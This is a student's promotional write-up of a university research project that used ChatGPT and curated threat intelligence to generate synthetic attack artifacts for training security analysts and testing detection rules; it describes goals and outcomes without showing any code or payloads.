In today’s dynamic threat landscape, organizations need more than static security policies—they need tools that reflect the complexity of real-world attacks. As part of my Master of Cybersecurity program, During my University, Master of Cybersecurity course I led a student’s research project in collaboration with Retrospect Lab, aimed at solving this very challenge.
Team Details: ( we were all third-semester students at Swinburne University of Technology, Master of Cyber Security)
Student Team Lead: Rajan Kandel
Other Team Members
Academic Supervisor: Yasas Supeksala
Industry Supervisor: Dr. Rory Coulter
Project Duration: 4 Months ( Feb – May 2024)
The Project – Brief Description
The Problem: Unrealistic, Manual Cyber Simulations
Cyber incident response has long relied on predefined attack scenarios, manual testing, or outdated simulation methods. While useful, these methods often suffer from:
Limited realism
Time-consuming setup
Lack of credible digital artifacts (the evidence attackers leave behind)
Simulating true-to-life cyber incidents is difficult without access to sensitive or real-world data—and this hinders training, detection development, and response testing.
Our Solution: AI-Powered Artifact Generation
To overcome this limitation, our team developed a framework that uses generative AI (ChatGPT) to simulate digital artifacts representing various types of cyberattacks. The framework is designed to support:
Endpoint attacks
Network-based intrusions
Phishing emails
IoT-based threats
Code injection and exploitation
We crafted structured prompts using curated data from:
CVE/NVD vulnerability databases
Real-world incident response blogs and threat reports
The AI then generated artifacts such as:
Registry modifications
Log entries (system, firewall, endpoint)
Malicious scripts and payloads
Obfuscated shellcode or attack fragments
Key Benefits
This AI-driven simulation framework brought multiple advantages:
Realism: Produces detailed and context-aware artifacts based on real-world threat intelligence.
Scalability: Easily extended to support new attack vectors, platforms, and behaviors.
Accessibility: No specialized lab required—only a browser, an internet connection, and AI access.
It’s an ideal tool for:
Training SOC analysts and red/blue teams
Testing SIEM detection rules
Benchmarking and improving incident response workflows
Project Outcomes
Our prototype was successfully tested with Retrospect Lab, meeting the project’s key goals. It provided a flexible, testable system for producing synthetic threat artifacts.
Future enhancements include:
Automating prompt generation and data ingestion
Integration with platforms like Microsoft Sentinel, Splunk, or Elastic
Ranking AI outputs using ML models for realism and detection value
Final Thoughts and Product
This project showcases how AI can revolutionize cybersecurity readiness. By generating realistic cyber artifacts at scale, we help organizations prepare for tomorrow’s attacks today.
It’s a fusion of automation, intelligence, and innovation that has the potential to change how we train, detect, and respond in the face of ever-evolving cyber threats.
After the project, we developed a database of attack types, vectors, techniques, and tactics, along with a prompt framework that enables ChatGPT or any generative AI to produce realistic incident artifacts.
